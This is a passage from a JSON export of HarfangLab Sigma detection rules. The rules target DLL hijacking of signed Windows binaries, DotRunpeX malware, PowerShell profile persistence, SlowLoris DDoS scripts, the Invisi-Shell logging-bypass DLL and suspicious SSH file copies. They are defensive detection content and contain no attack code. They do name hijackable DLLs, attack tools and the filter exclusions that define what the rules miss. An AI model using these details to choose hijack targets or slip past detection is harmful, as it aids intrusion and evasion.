filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e8149a4-c0a1-4afd-abbf-ca10b45c941a",
"rule_name": "DLL Hijacking via bdechangepin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bdechangepin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e8d2d23-6207-41ca-81a0-179883d4ed44",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604169Z",
"creation_date": "2026-03-23T11:45:34.604172Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604180Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/",
"https://cert.pl/en/posts/2023/09/unpacking-whats-packed-dotrunpex/",
"https://attack.mitre.org/techniques/T1055/012/"
],
"name": "t1055_012_dotrunpex_malware.yml",
"content": "title: DotRunpeX Malware Executed\nid: 4e8d2d23-6207-41ca-81a0-179883d4ed44\ndescription: |\n Detects the execution of the DotRunpeX malware.\n DotRunpeX is a .NET injector which is usually part of a second-stage infection.\n It is used to deliver numerous malware families and it is based on a custom version of KoiVM for obfuscation.\n It is recommended to examine the process tree associated with this process to try and identify which malware was delivered, as well as to try to determine the original source of infection.\nreferences:\n - https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/\n - https://cert.pl/en/posts/2023/09/unpacking-whats-packed-dotrunpex/\n - https://attack.mitre.org/techniques/T1055/012/\ndate: 2023/09/18\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.DotRunpeX\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - Product|contains: 'RunpeX.Stub.Framework'\n - OriginalFileName|contains: 'RunpeX.Stub.Framework'\n - Description|contains: 'RunpeX.Stub.Framework'\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e8d2d23-6207-41ca-81a0-179883d4ed44",
"rule_name": "DotRunpeX Malware Executed",
"rule_description": "Detects the execution of the DotRunpeX malware.\nDotRunpeX is a .NET injector which is usually part of a second-stage infection.\nIt is used to deliver numerous malware families and it is based on a custom version of KoiVM for obfuscation.\nIt is recommended to examine the process tree associated with this process to try and identify which malware was delivered, as well as to try to determine the original source of infection.\n",
"rule_creation_date": "2023-09-18",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e92ac72-e71c-4853-84f1-57cb55968cd8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072614Z",
"creation_date": "2026-03-23T11:45:34.072616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072620Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7",
"https://attack.mitre.org/techniques/T1546/013/"
],
"name": "t1546_013_persistence_powershell_profile.yml",
"content": "title: PowerShell Profile Created\nid: 4e92ac72-e71c-4853-84f1-57cb55968cd8\ndescription: |\n Detects creation of a PowerShell profile.\n PowerShell profile can be create to customize the user environment and add session-specific elements to every PowerShell session started.\n Attackers may use this file to establish persistence.\n It is recommended to investigate the context of this action to determine if the creation of the PowerShell profile is legitimate. It can be useful to use a job to download the PowerShell profile to look for malicious content.\nreferences:\n - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7\n - https://attack.mitre.org/techniques/T1546/013/\ndate: 2020/09/29\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.013\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection_host_program:\n Path|endswith:\n - '\\Documents\\PowerShell\\\\*_profile.ps1'\n - '\\Documents\\WindowsPowerShell\\\\*_profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\\\*_profile.ps1'\n\n selection_default:\n Path|endswith:\n - '\\Documents\\PowerShell\\profile.ps1'\n - '\\Documents\\WindowsPowerShell\\profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n\n exclusion_miniconda:\n ProcessCommandLine|contains|all:\n - 'miniconda3\\python.exe'\n - 'miniconda3\\scripts\\conda-script.py init'\n\n exclusion_anaconda:\n ProcessCommandLine|contains|all:\n - '\\anaconda3\\python.exe'\n - '\\anaconda3\\scripts\\conda-script.py init'\n\n exclusion_qnap:\n ProcessImage: '?:\\Program Files (x86)\\QNAP\\Qsync\\Qsync.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'QNAP Systems, Inc.'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft 
Windows'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e92ac72-e71c-4853-84f1-57cb55968cd8",
"rule_name": "PowerShell Profile Created",
"rule_description": "Detects creation of a PowerShell profile.\nPowerShell profile can be create to customize the user environment and add session-specific elements to every PowerShell session started.\nAttackers may use this file to establish persistence.\nIt is recommended to investigate the context of this action to determine if the creation of the PowerShell profile is legitimate. It can be useful to use a job to download the PowerShell profile to look for malicious content.\n",
"rule_creation_date": "2020-09-29",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.013"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4ea564c3-ba6c-41f7-a7e4-a7cea8da78bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609659Z",
"creation_date": "2026-03-23T11:45:34.609663Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609670Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/",
"https://github.com/maxkrivich/SlowLoris",
"https://github.com/StanGirard/SlowLoris-DDOS-Attack",
"https://github.com/0xc0d/Slow-Loris",
"https://github.com/GHubgenius/slowloris.pl",
"https://attack.mitre.org/techniques/T1499/002/"
],
"name": "t1498_slowloris_script_execution_windows.yml",
"content": "title: SlowLoris Script Execution (Windows)\nid: 4ea564c3-ba6c-41f7-a7e4-a7cea8da78bd\ndescription: |\n Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\n SlowLoris is a type of DDoS attack which allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\n It is recommended to analyze the script parameters to determine the target of the SlowLoris attack and to verify that the script execution is not part of an internal test.\nreferences:\n - https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/\n - https://github.com/maxkrivich/SlowLoris\n - https://github.com/StanGirard/SlowLoris-DDOS-Attack\n - https://github.com/0xc0d/Slow-Loris\n - https://github.com/GHubgenius/slowloris.pl\n - https://attack.mitre.org/techniques/T1499/002/\ndate: 2023/09/19\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1499.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.SlowLoris\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains:\n - 'slowloris.pl'\n - 'slowloris '\n - 'slowloris.py'\n\n # There is another rule for cloning\n filter_github:\n CommandLine|contains:\n - ' clone '\n - 'github'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4ea564c3-ba6c-41f7-a7e4-a7cea8da78bd",
"rule_name": "SlowLoris Script Execution (Windows)",
"rule_description": "Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\nSlowLoris is a type of DDoS attack which allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\nIt is recommended to analyze the script parameters to determine the target of the SlowLoris attack and to verify that the script execution is not part of an internal test.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1499.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4eb48a02-5752-4310-8937-54480b3a681e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081623Z",
"creation_date": "2026-03-23T11:45:34.081625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081629Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msg.yml",
"content": "title: DLL Hijacking via msg.exe\nid: 4eb48a02-5752-4310-8937-54480b3a681e\ndescription: |\n Detects potential Windows DLL Hijacking via msg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msg.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4eb48a02-5752-4310-8937-54480b3a681e",
"rule_name": "DLL Hijacking via msg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4ef873a0-9d40-4498-85a3-d1610a041785",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587899Z",
"creation_date": "2026-03-23T11:45:34.587902Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587910Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_timeout.yml",
"content": "title: DLL Hijacking via timeout.exe\nid: 4ef873a0-9d40-4498-85a3-d1610a041785\ndescription: |\n Detects potential Windows DLL Hijacking via timeout.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'timeout.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4ef873a0-9d40-4498-85a3-d1610a041785",
"rule_name": "DLL Hijacking via timeout.exe",
"rule_description": "Detects potential Windows DLL Hijacking via timeout.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4f0c19f4-076d-45e7-a2fc-983031de6c3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082635Z",
"creation_date": "2026-03-23T11:45:34.082637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082642Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/OmerYa/Invisi-Shell",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_invisishell_dll_loaded.yml",
"content": "title: Invisi-Shell DLL Loaded\nid: 4f0c19f4-076d-45e7-a2fc-983031de6c3b\ndescription: |\n Detects the loading of the Invisi-Shell DLL.\n Invisi-Shell is a tool allowing attackers, through a COR Profiler and .NET assemblies hooking, to bypass all PowerShell security features including logging, ScriptBlock, AMSI, etc.\n It is recommended to verify the legitimacy of the loaded DLL and to analyze the execution context to look for malicious actions.\nreferences:\n - https://github.com/OmerYa/Invisi-Shell\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2020/10/11\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1574.012\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.Invisi-Shell\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\InvisiShellProfiler.dll'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4f0c19f4-076d-45e7-a2fc-983031de6c3b",
"rule_name": "Invisi-Shell DLL Loaded",
"rule_description": "Detects the loading of the Invisi-Shell DLL.\nInvisi-Shell is a tool allowing attackers, through a COR Profiler and .NET assemblies hooking, to bypass all PowerShell security features including logging, ScriptBlock, AMSI, etc.\nIt is recommended to verify the legitimacy of the loaded DLL and to analyze the execution context to look for malicious actions.\n",
"rule_creation_date": "2020-10-11",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4f4d048d-3d6e-4acf-8523-692f7e0619b4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619152Z",
"creation_date": "2026-03-23T11:45:34.619154Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619159Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_clipup.yml",
"content": "title: DLL Hijacking via clipup.exe\nid: 4f4d048d-3d6e-4acf-8523-692f7e0619b4\ndescription: |\n Detects potential Windows DLL Hijacking via clipup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'clipup.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith:\n - '\\CRYPTXML.dll'\n - '\\webservices.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4f4d048d-3d6e-4acf-8523-692f7e0619b4",
"rule_name": "DLL Hijacking via clipup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via clipup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4f7f72d0-446d-4b85-9c35-0feebc738c90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613050Z",
"creation_date": "2026-03-23T11:45:34.613053Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613061Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1133/",
"https://attack.mitre.org/techniques/T1021/004/"
],
"name": "t1105_remote_file_copied_to_suspicious_path_via_ssh.yml",
"content": "title: Remote File Copied via SSH to Suspicious Directory\nid: 4f7f72d0-446d-4b85-9c35-0feebc738c90\ndescription: |\n Detects the copy of a file to a suspicious or unusual directory from a remote host using SSH or one of its utilities (like scp).\n Adversaries may transfer tools or other files from an external system into a compromised environment as part of their malicious activity.\n It is recommended to investigate the context of this action to determine whether the file copy is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1133/\n - https://attack.mitre.org/techniques/T1021/004/\ndate: 2024/02/26\nmodified: 2025/06/05\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.persistence\n - attack.initial_access\n - attack.t1133\n - attack.lateral_movement\n - attack.t1021.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_process:\n ProcessImage|endswith: '/sftp-server'\n\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n\n selection_path:\n # NOTE: `/opt/` and `/usr/share` were left out because of an unmanageable amount\n # of custom scripts that update assets to those directories.\n Path|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/usr/local/'\n - '/lib/'\n - '/lib64/'\n - '/usr/lib/'\n - '/usr/lib64/'\n - '/usr/libexec/'\n - '/usr/share/'\n - '/snap/'\n - '/tmp/'\n - '/var/tmp/'\n\n # Avoids false positives when updating the resources or assets of services\n exclusion_filetype:\n Path|endswith:\n - '.txt'\n - '.txt.filepart'\n - '.png'\n - '.png.filepart'\n - '.jpg'\n - '.jpg.filepart'\n - '.jpeg'\n - 